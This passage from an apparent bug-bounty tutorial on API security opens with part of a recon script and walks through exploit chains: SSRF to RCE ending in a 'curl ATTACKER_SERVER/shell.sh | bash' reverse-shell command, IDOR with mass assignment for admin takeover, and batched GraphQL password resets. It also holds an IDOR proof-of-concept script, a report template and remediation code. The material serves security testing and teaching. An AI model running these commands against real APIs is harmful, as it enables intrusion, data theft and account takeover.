class="s2">"</span> 2&gt;/dev/null | <span class="se">\</span> <span class="nb">grep</span> <span class="nt">-oP</span> <span class="s1">'["'</span><span class="s2">"'"</span><span class="s1">']https?://[^"'</span><span class="s2">"'"</span><span class="s1">']*'</span><span class="s2">"</span><span class="nv">$TARGET</span><span class="s2">"</span><span class="s1">'[^"'</span><span class="s2">"'"</span><span class="s1">']*'</span><span class="s2">" &gt;&gt; </span><span class="nv">$OUTDIR</span><span class="s2">/urls/js_endpoints_raw.txt done &lt; </span><span class="nv">$OUTDIR</span><span class="s2">/urls/js_files.txt sort -u </span><span class="nv">$OUTDIR</span><span class="s2">/urls/js_endpoints_raw.txt -o </span><span class="nv">$OUTDIR</span><span class="s2">/urls/js_endpoints.txt # === Phase 4: Subdomain Enumeration === echo "</span><span class="o">[</span><span class="k">*</span><span class="o">]</span> Subdomain enumeration<span class="s2">" subfinder -d </span><span class="nv">$TARGET</span><span class="s2"> -all -silent &gt; </span><span class="nv">$OUTDIR</span><span class="s2">/subdomains/subfinder.txt # Filter live cat </span><span class="nv">$OUTDIR</span><span class="s2">/subdomains/subfinder.txt | httpx -silent -ports 80,443,8080,8443,3000,9090,5000,7000,8000 </span><span class="se">\</span><span class="s2"> &gt; </span><span class="nv">$OUTDIR</span><span class="s2">/subdomains/live_subs.txt # Filter API-related subdomains grep -iE "</span>api|gateway|backend|internal|admin|dev|staging|uat|sandbox|edge|cdn|test|beta|stage<span class="s2">" </span><span class="se">\</span><span class="s2"> </span><span class="nv">$OUTDIR</span><span class="s2">/subdomains/live_subs.txt &gt; </span><span class="nv">$OUTDIR</span><span class="s2">/subdomains/api_subs.txt echo "</span> Found <span class="si">$(</span><span class="nb">wc</span> <span class="nt">-l</span> &lt; <span class="nv">$OUTDIR</span>/subdomains/live_subs.txt<span class="si">)</span> live subdomains<span class="s2">" echo "</span> Found <span class="si">$(</span><span class="nb">wc</span> <span class="nt">-l</span> &lt; <span class="nv">$OUTDIR</span>/subdomains/api_subs.txt<span class="si">)</span> API-related subdomains<span class="s2">" # === Phase 5: Swagger/OpenAPI Discovery === echo "</span><span class="o">[</span><span class="k">*</span><span class="o">]</span> Swagger/OpenAPI discovery<span class="s2">" swagger_paths=( "</span>/swagger.json<span class="s2">" "</span>/swagger.yaml<span class="s2">" "</span>/api-docs<span class="s2">" "</span>/openapi.json<span class="s2">" "</span>/openapi.yaml<span class="s2">" "</span>/v2/api-docs<span class="s2">" "</span>/v3/api-docs<span class="s2">" "</span>/swagger-resources<span class="s2">" "</span>/docs<span class="s2">" "</span>/redoc<span class="s2">" "</span>/api/swagger.json<span class="s2">" "</span>/api/v1/swagger.json<span class="s2">" "</span>/api/v2/swagger.json<span class="s2">" ) for sub in </span><span class="si">$(</span><span class="nb">cat</span> <span class="nv">$OUTDIR</span>/subdomains/api_subs.txt<span class="si">)</span><span class="s2">; do for path in "</span><span class="k">${</span><span class="nv">swagger_paths</span><span class="p">[@]</span><span class="k">}</span><span class="s2">"; do status=</span><span class="si">$(</span>curl <span class="nt">-s</span> <span class="nt">-o</span> /dev/null <span class="nt">-w</span> <span class="s2">"%{http_code}"</span> <span class="nt">--connect-timeout</span> 3 <span class="s2">"</span><span class="nv">$sub$path</span><span class="s2">"</span> 2&gt;/dev/null<span class="si">)</span><span class="s2"> if [ "</span><span class="nv">$status</span><span class="s2">" = "</span>200<span class="s2">" ]; then echo "</span><span class="nv">$sub$path</span><span class="s2">" &gt;&gt; </span><span class="nv">$OUTDIR</span><span class="s2">/swagger/found_swagger.txt echo "</span> FOUND: <span class="nv">$sub$path</span><span class="s2">" fi done done # === Phase 6: Directory Fuzzing === echo "</span><span class="o">[</span><span class="k">*</span><span class="o">]</span> Directory fuzzing on discovered endpoints<span class="s2">" ffuf -u https://api.</span><span class="nv">$TARGET</span><span class="s2">/FUZZ </span><span class="se">\</span><span class="s2"> -w /usr/share/seclists/Discovery/Web-Content/common-api-endpoints.txt </span><span class="se">\</span><span class="s2"> -mc all -fc 404 -fs 0 </span><span class="se">\</span><span class="s2"> -o </span><span class="nv">$OUTDIR</span><span class="s2">/ffuf/api_directories.json -of json -s 2&gt;/dev/null ffuf -u https://</span><span class="nv">$TARGET</span><span class="s2">/FUZZ </span><span class="se">\</span><span class="s2"> -w /usr/share/seclists/Discovery/Web-Content/common-api-endpoints.txt </span><span class="se">\</span><span class="s2"> -mc all -fc 404 -fs 0 </span><span class="se">\</span><span class="s2"> -o </span><span class="nv">$OUTDIR</span><span class="s2">/ffuf/root_directories.json -of json -s 2&gt;/dev/null # === Phase 7: Parameter Discovery === echo "</span><span class="o">[</span><span class="k">*</span><span class="o">]</span> Parameter discovery<span class="s2">" arjun -i </span><span class="nv">$OUTDIR</span><span class="s2">/urls/api_endpoints.txt </span><span class="se">\</span><span class="s2"> -o </span><span class="nv">$OUTDIR</span><span class="s2">/params/arjun_params.json </span><span class="se">\</span><span class="s2"> --timeout 10 -q 2&gt;/dev/null # === Phase 8: Nuclei API Scanning === echo "</span><span class="o">[</span><span class="k">*</span><span class="o">]</span> Running nuclei API scans<span class="s2">" nuclei -l </span><span class="nv">$OUTDIR</span><span class="s2">/subdomains/live_subs.txt </span><span class="se">\</span><span class="s2"> -t ~/nuclei-templates/http/exposed-panels/ </span><span class="se">\</span><span class="s2"> -t ~/nuclei-templates/misconfiguration/ </span><span class="se">\</span><span class="s2"> -o </span><span class="nv">$OUTDIR</span><span class="s2">/nuclei_results.txt -silent 2&gt;/dev/null nuclei -l </span><span class="nv">$OUTDIR</span><span class="s2">/subdomains/api_subs.txt </span><span class="se">\</span><span class="s2"> -t ~/nuclei-templates/http/exposures/ </span><span class="se">\</span><span class="s2"> -o </span><span class="nv">$OUTDIR</span><span class="s2">/nuclei_api_results.txt -silent 2&gt;/dev/null # === Summary === echo "" echo "</span><span class="o">[</span>+] Recon Complete!<span class="s2">" echo "</span><span class="o">[</span>+] Output directory: <span class="nv">$OUTDIR</span>/<span class="s2">" echo "" echo "</span> Passive URLs: <span class="si">$(</span><span class="nb">wc</span> <span class="nt">-l</span> &lt; <span class="nv">$OUTDIR</span>/urls/all_passive_urls.txt<span class="si">)</span><span class="s2">" echo "</span> API Endpoints: <span class="si">$(</span><span class="nb">wc</span> <span class="nt">-l</span> &lt; <span class="nv">$OUTDIR</span>/urls/api_endpoints.txt<span class="si">)</span><span class="s2">" echo "</span> Live Subdomains: <span class="si">$(</span><span class="nb">wc</span> <span class="nt">-l</span> &lt; <span class="nv">$OUTDIR</span>/subdomains/live_subs.txt<span class="si">)</span><span class="s2">" echo "</span> API Subdomains: <span class="si">$(</span><span class="nb">wc</span> <span class="nt">-l</span> &lt; <span class="nv">$OUTDIR</span>/subdomains/api_subs.txt<span class="si">)</span><span class="s2">" echo "</span> Swagger Found: <span class="si">$(</span><span class="nb">wc</span> <span class="nt">-l</span> &lt; <span class="nv">$OUTDIR</span>/swagger/found_swagger.txt 2&gt;/dev/null <span class="o">||</span> <span class="nb">echo </span>0<span class="si">)</span><span class="s2">" echo "" echo "</span><span class="o">[</span>+] Next steps:<span class="s2">" echo "</span> 1. Review <span class="nv">$OUTDIR</span>/urls/api_endpoints.txt <span class="k">for </span>hidden endpoints<span class="s2">" echo "</span> 2. Test Swagger docs at <span class="nv">$OUTDIR</span>/swagger/found_swagger.txt<span class="s2">" echo "</span> 3. Check <span class="nv">$OUTDIR</span>/params/arjun_params.json <span class="k">for </span>hidden parameters<span class="s2">" echo "</span> 4. Run auth bypass tests against discovered endpoints<span class="s2">" echo "</span> 5. Run injection tests <span class="o">(</span>SQLi, NoSQLi, Cmd injection, SSRF<span class="o">)</span><span class="s2">" </span></code></pre> </div> <h2> Phase 8: Exploit Chaining — From Recon to Critical Finding </h2> <h3> Chain Example 1: Blind SSRF → Internal Service Discovery → RCE </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Step 1: Find an endpoint that fetches URLs</span> <span class="c"># Avatar upload/profile image endpoint</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/profile/avatar?url=http://example.com/test.jpg"</span> <span class="c"># Step 2: Test for SSRF</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/profile/avatar?url=http://127.0.0.1:8080/"</span> <span class="c"># Response contains internal HTML → SSRF confirmed</span> <span class="c"># Step 3: Port scan internal network via SSRF</span> <span class="k">for </span>port <span class="k">in </span>80 443 3000 5000 6379 8080 8443 9200 27017 22 21 3306 5432 8000 9000 9090<span class="p">;</span> <span class="k">do </span><span class="nv">status</span><span class="o">=</span><span class="si">$(</span>curl <span class="nt">-s</span> <span class="nt">-o</span> /dev/null <span class="nt">-w</span> <span class="s2">"%{http_code}"</span> <span class="nt">--connect-timeout</span> 3 <span class="se">\</span> <span class="s2">"https://api.target.com/v1/profile/avatar?url=http://127.0.0.1:</span><span class="nv">$port</span><span class="s2">/"</span><span class="si">)</span> <span class="nb">echo</span> <span class="s2">"Port </span><span class="nv">$port</span><span class="s2">: </span><span class="nv">$status</span><span class="s2">"</span> <span class="k">done</span> <span class="c"># Step 4: Discover internal admin panel</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/profile/avatar?url=http://internal-admin.target.internal:8080/"</span> <span class="c"># Returns internal admin panel HTML</span> <span class="c"># Step 5: Explore admin panel functionality</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/profile/avatar?url=http://internal-admin.target.internal:8080/deploy"</span> <span class="c"># Found deployment endpoint</span> <span class="c"># Step 6: Exploit for RCE</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/profile/avatar?url=http://internal-admin.target.internal:8080/deploy?cmd=ls"</span> <span class="c"># Command execution confirmed</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/profile/avatar?url=http://internal-admin.target.internal:8080/deploy?cmd=curl+http://ATTACKER_SERVER/shell.sh+|+bash"</span> <span class="c"># Reverse shell established → Full internal network access</span> </code></pre> </div> <h3> Chain Example 2: IDOR → Mass Assignment → Account Takeover </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Step 1: Discover user profile endpoint with ID</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/users/me"</span> <span class="nt">-H</span> <span class="s2">"Authorization: Bearer </span><span class="nv">$TOKEN</span><span class="s2">"</span> <span class="c"># {"id": 1337, "name": "Victim", "email": "victim@test.com", "role": "user"}</span> <span class="c"># Step 2: Test IDOR — try other user IDs</span> curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/users/1"</span> <span class="nt">-H</span> <span class="s2">"Authorization: Bearer </span><span class="nv">$TOKEN</span><span class="s2">"</span> <span class="c"># {"id": 1, "name": "Admin", "email": "admin@test.com", "role": "admin"}</span> <span class="c"># IDOR confirmed — can access any user's data</span> <span class="c"># Step 3: Try mass assignment on PUT endpoint</span> curl <span class="nt">-X</span> PUT <span class="s2">"https://api.target.com/v1/users/1"</span> <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Content-Type: application/json"</span> <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Authorization: Bearer </span><span class="nv">$TOKEN</span><span class="s2">"</span> <span class="se">\</span> <span class="nt">-d</span> <span class="s1">'{"role": "user"}'</span> <span class="c"># Try demoting admin</span> <span class="c"># Step 4: If direct role change doesn't work, try extra fields</span> curl <span class="nt">-X</span> PUT <span class="s2">"https://api.target.com/v1/users/1"</span> <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Content-Type: application/json"</span> <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Authorization: Bearer </span><span class="nv">$TOKEN</span><span class="s2">"</span> <span class="se">\</span> <span class="nt">-d</span> <span class="s1">'{"email": "attacker@test.com"}'</span> <span class="c"># Step 5: Change admin email → trigger password reset</span> curl <span class="nt">-X</span> POST <span class="s2">"https://api.target.com/v1/forgot-password"</span> <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Content-Type: application/json"</span> <span class="se">\</span> <span class="nt">-d</span> <span class="s1">'{"email": "attacker@test.com"}'</span> <span class="c"># Step 6: Reset admin password → full admin account takeover</span> </code></pre> </div> <h3> Chain Example 3: GraphQL Introspection → Batching → Data Exfiltration </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Step 1: Introspect GraphQL schema</span> inql <span class="nt">-t</span> https://api.target.com/graphql <span class="nt">-d</span> <span class="c"># Found hidden mutation: "resetUserPassword(userId: ID!, newPassword: String!)"</span> <span class="c"># Step 2: Try batching to bypass rate limits</span> curl <span class="nt">-s</span> https://api.target.com/graphql <span class="se">\</span> <span class="nt">-X</span> POST <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Content-Type: application/json"</span> <span class="se">\</span> <span class="nt">-d</span> <span class="s1">'[ {"query": "mutation { resetUserPassword(userId: 1, newPassword: \"Hacked123!\") { success } }"}, {"query": "mutation { resetUserPassword(userId: 2, newPassword: \"Hacked123!\") { success } }"}, {"query": "mutation { resetUserPassword(userId: 3, newPassword: \"Hacked123!\") { success } }"} ]'</span> <span class="c"># Step 3: Enumerate user IDs and reset all</span> <span class="k">for </span>user_id <span class="k">in</span> <span class="si">$(</span><span class="nb">seq </span>1 100<span class="si">)</span><span class="p">;</span> <span class="k">do </span><span class="nb">echo</span> <span class="s2">"{</span><span class="se">\"</span><span class="s2">query</span><span class="se">\"</span><span class="s2">: </span><span class="se">\"</span><span class="s2">mutation { resetUserPassword(userId: </span><span class="nv">$user_id</span><span class="s2">, newPassword: </span><span class="se">\\\"</span><span class="s2">Hacked123!</span><span class="se">\\\"</span><span class="s2">) { success } }</span><span class="se">\"</span><span class="s2">}"</span> <span class="k">done</span> <span class="o">&gt;</span> batch_reset.json curl <span class="nt">-s</span> https://api.target.com/graphql <span class="se">\</span> <span class="nt">-X</span> POST <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Content-Type: application/json"</span> <span class="se">\</span> <span class="nt">-d</span> <span class="s2">"</span><span class="si">$(</span><span class="nb">cat </span>batch_reset.json<span class="si">)</span><span class="s2">"</span> </code></pre> </div> <h2> Reporting &amp; Documentation Template </h2> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Vulnerability: [Title]</span> <span class="k">**</span>Severity:<span class="k">**</span> Critical / High / Medium / Low <span class="k">**</span>CVSS Score:<span class="k">**</span> X.X <span class="o">(</span>AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H<span class="o">)</span> <span class="k">**</span>Endpoint:<span class="k">**</span> <span class="sb">`</span>POST /api/v1/users/forgot-password<span class="sb">`</span> <span class="k">**</span>Category:<span class="k">**</span> <span class="o">[</span>OWASP API#] <span class="k">**</span>CWE:<span class="k">**</span> <span class="o">[</span>CWE-ID] <span class="k">**</span>Date Discovered:<span class="k">**</span> YYYY-MM-DD </code></pre> </div> <h2> Description </h2> <p>[Clear, concise description of the vulnerability and its business impact]</p> <p>Example:<br> The <code>/api/v1/users/{id}</code> endpoint lacks proper authorization checks, allowing any authenticated user to access the profile data of any other user by simply changing the <code>id</code> parameter. This exposes sensitive personally identifiable information (PII) including email addresses, phone numbers, and billing details of all platform users.</p> <h2> Steps to Reproduce </h2> <ol> <li> <strong>Authenticate</strong> as a low-privilege user and obtain a valid JWT token: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code> curl <span class="nt">-X</span> POST https://api.target.com/auth/login <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Content-Type: application/json"</span> <span class="se">\</span> <span class="nt">-d</span> <span class="s1">'{"username": "attacker@test.com", "password": "Password123!"}'</span> </code></pre> </div> <ol> <li> <strong>Attempt to access another user's profile</strong> by modifying the user ID: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code> curl <span class="nt">-s</span> https://api.target.com/v1/users/1 <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Authorization: Bearer </span><span class="nv">$LOW_PRIV_TOKEN</span><span class="s2">"</span> </code></pre> </div> <ol> <li><p><strong>Observe that admin user data is returned</strong> without authorization.</p></li> <li><p><strong>Enumerate all users</strong> to confirm mass data exposure:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code> <span class="k">for </span><span class="nb">id </span><span class="k">in</span> <span class="si">$(</span><span class="nb">seq </span>1 1000<span class="si">)</span><span class="p">;</span> <span class="k">do </span>curl <span class="nt">-s</span> <span class="s2">"https://api.target.com/v1/users/</span><span class="nv">$id</span><span class="s2">"</span> <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Authorization: Bearer </span><span class="nv">$TOKEN</span><span class="s2">"</span> | jq <span class="nt">-r</span> <span class="s1">'.email // empty'</span> <span class="k">done</span> </code></pre> </div> <h2> Proof of Concept </h2> <h3> Minimal Reproduction </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c">#!/bin/bash</span> <span class="c"># IDOR PoC — extracts all user emails</span> <span class="nv">TOKEN</span><span class="o">=</span><span class="s2">"eyJhbGciOiJIUzI1NiIs..."</span> <span class="c"># Low-privilege user token</span> <span class="nv">BASE</span><span class="o">=</span><span class="s2">"https://api.target.com"</span> <span class="nb">echo</span> <span class="s2">"[+] Enumerating users via IDOR..."</span> <span class="k">for </span><span class="nb">id </span><span class="k">in</span> <span class="si">$(</span><span class="nb">seq </span>1 10<span class="si">)</span><span class="p">;</span> <span class="k">do </span><span class="nv">response</span><span class="o">=</span><span class="si">$(</span>curl <span class="nt">-s</span> <span class="s2">"</span><span class="nv">$BASE</span><span class="s2">/v1/users/</span><span class="nv">$id</span><span class="s2">"</span> <span class="nt">-H</span> <span class="s2">"Authorization: Bearer </span><span class="nv">$TOKEN</span><span class="s2">"</span><span class="si">)</span> <span class="nv">email</span><span class="o">=</span><span class="si">$(</span><span class="nb">echo</span> <span class="s2">"</span><span class="nv">$response</span><span class="s2">"</span> | jq <span class="nt">-r</span> <span class="s1">'.email // "N/A"'</span><span class="si">)</span> <span class="nv">role</span><span class="o">=</span><span class="si">$(</span><span class="nb">echo</span> <span class="s2">"</span><span class="nv">$response</span><span class="s2">"</span> | jq <span class="nt">-r</span> <span class="s1">'.role // "N/A"'</span><span class="si">)</span> <span class="nb">echo</span> <span class="s2">"User </span><span class="nv">$id</span><span class="s2">: </span><span class="nv">$email</span><span class="s2"> (Role: </span><span class="nv">$role</span><span class="s2">)"</span> <span class="k">done</span> </code></pre> </div> <h3> Sample Output </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>[+] Enumerating users via IDOR... User 1: admin@target.com (Role: admin) User 2: user1@target.com (Role: user) User 3: user2@target.com (Role: user) User 4: vip@target.com (Role: premium) User 5: support@target.com (Role: support) </code></pre> </div> <h3> HTTP Request/Response </h3> <p><strong>Request:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight http"><code><span class="nf">GET</span> <span class="nn">/v1/users/1</span> <span class="k">HTTP</span><span class="o">/</span><span class="m">1.1</span> <span class="na">Host</span><span class="p">:</span> <span class="s">api.target.com</span> <span class="na">Authorization</span><span class="p">:</span> <span class="s">Bearer eyJhbGciOiJIUzI1NiIs...</span> <span class="na">Accept</span><span class="p">:</span> <span class="s">application/json</span> </code></pre> </div> <p><strong>Response:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight http"><code><span class="k">HTTP</span><span class="o">/</span><span class="m">1.1</span> <span class="m">200</span> <span class="ne">OK</span> <span class="na">Content-Type</span><span class="p">:</span> <span class="s">application/json</span> <span class="p">{</span><span class="w"> </span><span class="nl">"id"</span><span class="p">:</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="nl">"email"</span><span class="p">:</span><span class="w"> </span><span class="s2">"admin@target.com"</span><span class="p">,</span><span class="w"> </span><span class="nl">"name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Admin User"</span><span class="p">,</span><span class="w"> </span><span class="nl">"role"</span><span class="p">:</span><span class="w"> </span><span class="s2">"admin"</span><span class="p">,</span><span class="w"> </span><span class="nl">"phone"</span><span class="p">:</span><span class="w"> </span><span class="s2">"+1-555-0123"</span><span class="p">,</span><span class="w"> </span><span class="nl">"address"</span><span class="p">:</span><span class="w"> </span><span class="s2">"123 Admin St, San Francisco, CA"</span><span class="p">,</span><span class="w"> </span><span class="nl">"payment_method"</span><span class="p">:</span><span class="w"> </span><span class="s2">"visa_****_4242"</span><span class="p">,</span><span class="w"> </span><span class="nl">"billing_history"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="s2">"Invoice #INV-001"</span><span class="p">,</span><span class="w"> </span><span class="s2">"Invoice #INV-002"</span><span class="p">]</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <h2> Impact </h2> <p>[What can an attacker actually achieve? Be specific about data exposure, financial loss, reputational damage, etc.]</p> <p><strong>Data Exposure:</strong></p> <ul> <li>Full PII (names, emails, phone numbers, addresses) of all 100,000+ platform users</li> <li>Payment method metadata (card type, last 4 digits, expiry)</li> <li>Internal user role assignments revealing admin accounts</li> </ul> <p><strong>Account Takeover Vector:</strong></p> <ul> <li>The exposed email addresses can be used with the <code>/api/v1/auth/forgot-password</code> endpoint to initiate password resets</li> <li>Combined with the OTP rate-limit bypass (see Finding #2), an attacker can achieve <strong>mass account takeover</strong> </li> </ul> <p><strong>CVSS 3.1 Calculation:</strong></p> <ul> <li> <strong>AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N</strong> → <strong>Score: 8.1 (High)</strong> </li> <li>Confidentiality: High — full PII database exposed</li> <li>Integrity: High — can modify victim profiles (PUT endpoint also lacks auth)</li> <li>Availability: None</li> </ul> <h2> Remediation </h2> <h3> Immediate Fix (1-2 days) </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># Implement proper ownership checks on all object-level endpoints </span><span class="nd">@app.route</span><span class="p">(</span><span class="sh">'</span><span class="s">/api/v1/users/&lt;user_id&gt;</span><span class="sh">'</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="sh">'</span><span class="s">GET</span><span class="sh">'</span><span class="p">])</span> <span class="k">def</span> <span class="nf">get_user</span><span class="p">(</span><span class="n">user_id</span><span class="p">):</span> <span class="n">current_user</span> <span class="o">=</span> <span class="nf">get_jwt_identity</span><span class="p">()</span> <span class="c1"># Verify the requesting user owns this resource OR has admin role </span> <span class="k">if</span> <span class="n">current_user</span><span class="p">[</span><span class="sh">'</span><span class="s">id</span><span class="sh">'</span><span class="p">]</span> <span class="o">!=</span> <span class="nf">int</span><span class="p">(</span><span class="n">user_id</span><span class="p">)</span> <span class="ow">and</span> <span class="sh">'</span><span class="s">admin</span><span class="sh">'</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">current_user</span><span class="p">[</span><span class="sh">'</span><span class="s">roles</span><span class="sh">'</span><span class="p">]:</span> <span class="k">return</span> <span class="nf">jsonify</span><span class="p">({</span><span class="sh">"</span><span class="s">error</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">Unauthorized</span><span class="sh">"</span><span class="p">}),</span> <span class="mi">403</span> <span class="n">user</span> <span class="o">=</span> <span class="n">User</span><span class="p">.</span><span class="n">query</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="n">user_id</span><span class="p">)</span> <span class="k">return</span> <span class="nf">jsonify</span><span class="p">(</span><span class="n">user</span><span class="p">.</span><span class="nf">to_dict</span><span class="p">())</span> </code></pre> </div> <h3> Short-term Fix (1 week) </h3> <ol> <li> <strong>Implement proper RBAC</strong> — define roles (user, moderator, admin, superadmin) with explicit permission matrices</li> <li> <strong>Use UUIDs instead of sequential integers</strong> for object references (prevents enumeration but does not fix the underlying auth issue — defense in depth)</li> <li> <strong>Add rate limiting</strong> on all sensitive GET endpoints to slow enumeration attempts</li> </ol> <h3> Long-term Fix (1 month) </h3> <ol> <li> <strong>Adopt OWASP API Security best practices</strong> — implement a centralized authorization layer (e.g., OPA, Casbin, or custom middleware)</li> <li> <strong>Regular automated API security scanning</strong> in CI/CD pipeline using tools like: <ul> <li> <code>nuclei</code> with custom API templates</li> <li> <code>mitmproxy2swagger</code> + <code>ddosify</code> for contract testing</li> <li>OWASP ZAP API scans</li> </ul> </li> <li> <strong>Penetration testing</strong> — schedule quarterly API-specific pentests</li> </ol> <h2> References </h2> <ul> <li><a href="https://owasp.org/API-Security/editions/2023/en/0xa1-broken-object-level-authorization/" rel="noopener noreferrer">OWASP API Security Top 10: API1:2023 — Broken Object Level Authorization</a></li> <li><a href="https://cwe.mitre.org/data/definitions/284.html" rel="noopener noreferrer">CWE-284: Improper Access Control (Authorization)</a></li> <li><a href="https://cwe.mitre.org/data/definitions/639.html" rel="noopener noreferrer">CWE-639: Authorization Bypass Through User-Controlled Key</a></li> <li><a href="https://portswigger.net/web-security/access-control/idor" rel="noopener noreferrer">PortSwigger Research: IDOR — Insecure Direct Object References</a></li> </ul> <h2> Burp Suite Professional — Macro-Based Re-testing </h2> <div class="highlight js-code-highlight"> <pre class="highlight xml"><code><span class="c">&lt;!-- Import into Burp as Session Handling Rule --&gt;</span> <span class="nt">&lt;macro&gt;</span> <span class="nt">&lt;macroItem&gt;</span> <span class="nt">&lt;request&gt;</span> <span class="nt">&lt;url&gt;</span>https://api.target.com/v1/users/1<span class="nt">&lt;/url&gt;</span> <span class="nt">&lt;headers&gt;</span> <span class="nt">&lt;header&gt;</span>Authorization: Bearer $TOKEN$<span class="nt">&lt;/header&gt;</span> <span class="nt">&lt;/headers&gt;</span> <span class="nt">&lt;/request&gt;</span> <span class="nt">&lt;check&gt;</span>response.code != 403<span class="nt">&lt;/check&gt;</span> <span class="nt">&lt;/macroItem&gt;</span> <span class="nt">&lt;/macro&gt;</span> </code></pre> </div> <h2> OWASP API Security Top 10 (2023) Quick Reference </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>API#</th> <th>Category</th> <th>What to Test</th> <th>Common Bounty Range</th> </tr> </thead> <tbody> <tr> <td>API1:2023</td> <td>Broken Object Level Authorization</td> <td>IDOR on any object reference (users, orders, invoices)</td> <td>$500-$5,000</td> </tr> <tr> <td>API2:2023</td> <td>Broken Authentication</td> <td>JWT bypass, weak rate limits, password reset abuse</td> <td>$1,000-$10,000</td> </tr> <tr> <td>API3:2023</td> <td>Broken Object Property Level Mapping</td> <td>Mass assignment, extra fields in JSON payloads</td> <td>$500-$3,000</td> </tr> <tr> <td>API4:2023</td> <td>Unrestricted Resource Consumption</td> <td>DoS via deep pagination, batch queries, large payloads</td> <td>$250-$2,000</td> </tr> <tr> <td>API5:2023</td> <td>Broken Function Level Authorization</td> <td>Vertical privilege escalation (user→admin)</td> <td>$1,000-$8,000</td> </tr> <tr> <td>API6:2023</td> <td>Unrestricted Access to Sensitive Business Flows</td> <td>Automated abuse (coupons, votes, raffles, signups)</td> <td>$500-$5,000</td> </tr> <tr> <td>API7:2023</td> <td>Server Side Request Forgery</td> <td>URL fetching endpoints, file uploads, webhooks</td> <td>$1,000-$15,000</td> </tr> <tr> <td>API8:2023</td> <td>Security Misconfiguration</td> <td>CORS, error handling, default creds, verbose errors</td> <td>$250-$2,000</td> </tr> <tr> <td>API9:2023</td> <td>Improper Inventory Management</td> <td>Old API versions, staging/dev endpoints, debug routes</td> <td>$250-$1,500</td> </tr> <tr> <td>API10:2023</td> <td>Unsafe Consumption of APIs</td> <td>API-to-API trust issues, lack of input validation on downstream</td> <td>$500-$4,000</td> </tr> </tbody> </table></div> <h2> Essential Tools Cheatsheet </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Tool</th> <th>Purpose</th> <th>Install Command</th> </tr> </thead> <tbody> <tr> <td><strong>gau</strong></td> <td>Passive URL collection (Wayback, AlienVault, CommonCrawl)</td> <td><code>go install github.com/lc/gau/v2/cmd/gau@latest</code></td> </tr> <tr> <td><strong>httpx</strong></td> <td>HTTP probing — probe for live hosts</td> <td><code>go install github.com/projectdiscovery/httpx/cmd/httpx@latest</code></td> </tr> <tr> <td><strong>ffuf</strong></td> <td>Directory / parameter / VHost fuzzing</td> <td><code>go install github.com/ffuf/ffuf@latest</code></td> </tr> <tr> <td><strong>arjun</strong></td> <td>Hidden parameter discovery</td> <td><code>pip install arjun</code></td> </tr> <tr> <td><strong>inql</strong></td> <td>GraphQL analysis (Burp extension + standalone)</td> <td>BApp Store or <code>pip install inql</code> </td> </tr> <tr> <td><strong>graphw00f</strong></td> <td>GraphQL fingerprinting</td> <td><code>git clone https://github.com/dolevf/graphw00f</code></td> </tr> <tr> <td><strong>jwt_tool</strong></td> <td>JWT manipulation, cracking, scanning</td> <td> <code>pip install pyjwt</code> + <code>git clone https://github.com/ticarpi/jwt_tool</code> </td> </tr> <tr> <td><strong>jwt-cracker</strong></td> <td>JWT secret brute-force</td> <td><code>pip install pyjwt</code></td> </tr> <tr> <td><strong>waymore</strong></td> <td>Wayback Machine scraper (more data than gau)</td> <td><code>pip install waymore</code></td> </tr> <tr> <td><strong>subfinder</strong></td> <td>Passive subdomain discovery</td> <td><code>go install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest</code></td> </tr> <tr> <td><strong>nuclei</strong></td> <td>Template-based vulnerability scanning</td> <td><code>go install github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest</code></td> </tr> <tr> <td><strong>amass</strong></td> <td>OSINT + brute-force subdomain enumeration</td> <td><code>go install github.com/OWASP/Amass/v4/.../amass@master</code></td> </tr> <tr> <td><strong>clairvoyance</strong></td> <td>GraphQL introspection bypass</td> <td><code>pip install clairvoyance</code></td> </tr> <tr> <td><strong>graphqlmap</strong></td> <td>Interactive GraphQL exploitation</td> <td><code>git clone 